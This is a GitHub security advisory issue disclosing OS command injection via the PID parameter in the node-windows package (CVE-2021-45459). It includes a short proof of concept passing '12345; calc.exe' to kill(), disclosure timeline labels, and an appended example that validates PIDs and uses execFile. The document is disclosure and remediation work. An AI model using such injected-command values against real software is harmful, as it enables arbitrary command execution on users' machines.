OS Command Injection in node-windows #4

Closed
dwisiswant0 opened this issue Aug 5, 2021 · 2 comments
Labels
disclosed Disclosure/advisory has been published & disclosed patched Patch version released poc Proof-of-concept dropped
dwisiswant0 commented Aug 5, 2021

Description

lib/cmd.js in the node-windows package before 1.0.0-beta.6 for Node.js allows command injection via the PID parameter.

CVE ID: CVE-2021-45459

Proof of Concept

```js
// poc.js
var wincmd = require('node-windows');

wincmd.kill("12345; calc.exe", function(){
    console.log('Process Killed');
});
```

Impact

This issue may lead to arbitrary command execution.

References

@dwisiswant0 dwisiswant0 self-assigned this Aug 5, 2021
@dwisiswant0 dwisiswant0 added the needs triage Coordinated disclosure that need to be triaged label Aug 5, 2021
@dwisiswant0 dwisiswant0 added this to Needs triage in Advisory via automation Aug 5, 2021
github-actions bot commented Dec 4, 2021

It seems like it's been 120 days; has this disclosure not received a response from the vendor yet? Please make a decision in the next 2 days.

@github-actions github-actions bot added deadline Disclosure deadline (120-day) reached & make a decision for disclosure and removed deadline Disclosure deadline (120-day) reached & make a decision for disclosure labels Dec 4, 2021
@dwisiswant0 dwisiswant0 added the patched Patch version released label Dec 7, 2021
@dwisiswant0 dwisiswant0 added deadline Disclosure deadline (120-day) reached & make a decision for disclosure TBD Advisory to be determined labels Dec 16, 2021
@dwisiswant0

CVE requested.

@github-actions github-actions bot removed TBD Advisory to be determined deadline Disclosure deadline (120-day) reached & make a decision for disclosure labels Dec 17, 2021
@dwisiswant0 dwisiswant0 added disclosed Disclosure/advisory has been published & disclosed poc Proof-of-concept dropped and removed needs triage Coordinated disclosure that need to be triaged labels Dec 23, 2021
@dwisiswant0 dwisiswant0 changed the title OS Command Injection in huntr#5e232589-d78d-4cb8-9d0b-cb7c428ac059 OS Command Injection in node-windows Dec 23, 2021
@dwisiswant0 dwisiswant0 moved this from Needs triage to Disclosed in Advisory Dec 23, 2021
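
One way to close this class of bug in a `kill`-style wrapper, as an added example that is not node-windows code or its actual patch: validate the PID as a decimal integer and hand it to `taskkill` as an argument vector through `execFile`, so no shell parses it. The names `parsePid`, `taskkillArgs` and `safeKill` are hypothetical.

```javascript
// Added example; not node-windows source. All function names are hypothetical.
const { execFile } = require('child_process');

// Accept only a plain decimal PID. Input containing separators, whitespace,
// signs or any other non-digit is rejected before a process is spawned.
function parsePid(input) {
  const text = String(input);
  if (!/^[0-9]{1,10}$/.test(text)) {
    throw new TypeError('PID must be a decimal integer');
  }
  const pid = Number(text);
  if (pid <= 0 || pid > 0xffffffff) {
    throw new RangeError('PID out of range');
  }
  return pid;
}

// Build an argument vector instead of concatenating a command string.
function taskkillArgs(input, force) {
  const args = ['/PID', String(parsePid(input))];
  if (force) args.push('/F');
  return args;
}

// execFile starts taskkill directly with argv; the arguments are never
// interpreted by a command shell. Validation errors reach the callback.
function safeKill(input, force, callback) {
  let args;
  try {
    args = taskkillArgs(input, force);
  } catch (err) {
    return process.nextTick(callback, err);
  }
  execFile('taskkill', args, { windowsHide: true }, callback);
}
```
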